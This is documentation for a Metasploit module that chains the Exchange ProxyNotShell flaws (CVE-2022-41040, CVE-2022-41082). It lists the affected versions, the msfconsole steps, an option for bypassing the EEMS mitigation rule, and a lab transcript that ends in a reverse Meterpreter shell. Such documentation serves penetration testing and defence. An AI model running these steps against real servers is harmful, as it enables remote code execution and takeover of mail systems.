dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/windows/http/exchange_proxynotshell_rce.md

2.6 KiB
Raw Permalink Blame History

Vulnerable Application

This module chains two vulnerabilities on Microsoft Exchange Server that, when combined, allow an authenticated attacker to interact with the Exchange Powershell backend (CVE-2022-41040), where a deserialization flaw can be leveraged to obtain code execution (CVE-2022-41082). This exploit only support Exchange Server 2019.

By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server.

This vulnerability affects:

  • Exchange 2013 CU23 < 15.0.1497.44
  • Exchange 2016 CU22 < 15.1.2375.37
  • Exchange 2016 CU23 < 15.1.2507.16
  • Exchange 2019 CU11 < 15.2.986.36
  • Exchange 2019 CU12 < 15.2.1118.20

Source: Description of the security update for Microsoft Exchange Server 2019, 2016, and 2013: November 8, 2022 (KB5019758)

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/windows/http/exchange_proxynotshell_rce
  3. Do: set RHOSTS [IP]
  4. Do: set USERNAME [USERNAME]
  5. Do: set PASSWORD [PASSWORD]
  6. Do: run

Advanced Options

EemsBypass

Technique to bypass the EEMS rule.

none -- Make no attempt to bypass the EEMS rule. This can be used with the check method to determine if the EEMS M1 rule is applied. IBM037v1 -- Use IBM037 encoding combined with the X-Up-Devcap-Post-Charset header and UP User-Agent prefix. See ProxyNotRelay for more information.

MaxBackendRetries

The maximum number of times to retry for targeting the backend server with the SSRF. This is useful in environments where a Data Availability Group (DAG) is in place and causes requests to be sent to a random backend server.

Scenarios

Version and OS

msf6 exploit(windows/http/exchange_proxynotshell_rce) > set RHOSTS 192.168.159.11
RHOSTS => 192.168.159.11
msf6 exploit(windows/http/exchange_proxynotshell_rce) > set USERNAME aliddle
USERNAME => aliddle
msf6 exploit(windows/http/exchange_proxynotshell_rce) > set PASSWORD Password1!
PASSWORD => Password1!
msf6 exploit(windows/http/exchange_proxynotshell_rce) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (175686 bytes) to 192.168.159.11
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.11:7290) at 2022-11-18 17:32:18 -0500

meterpreter >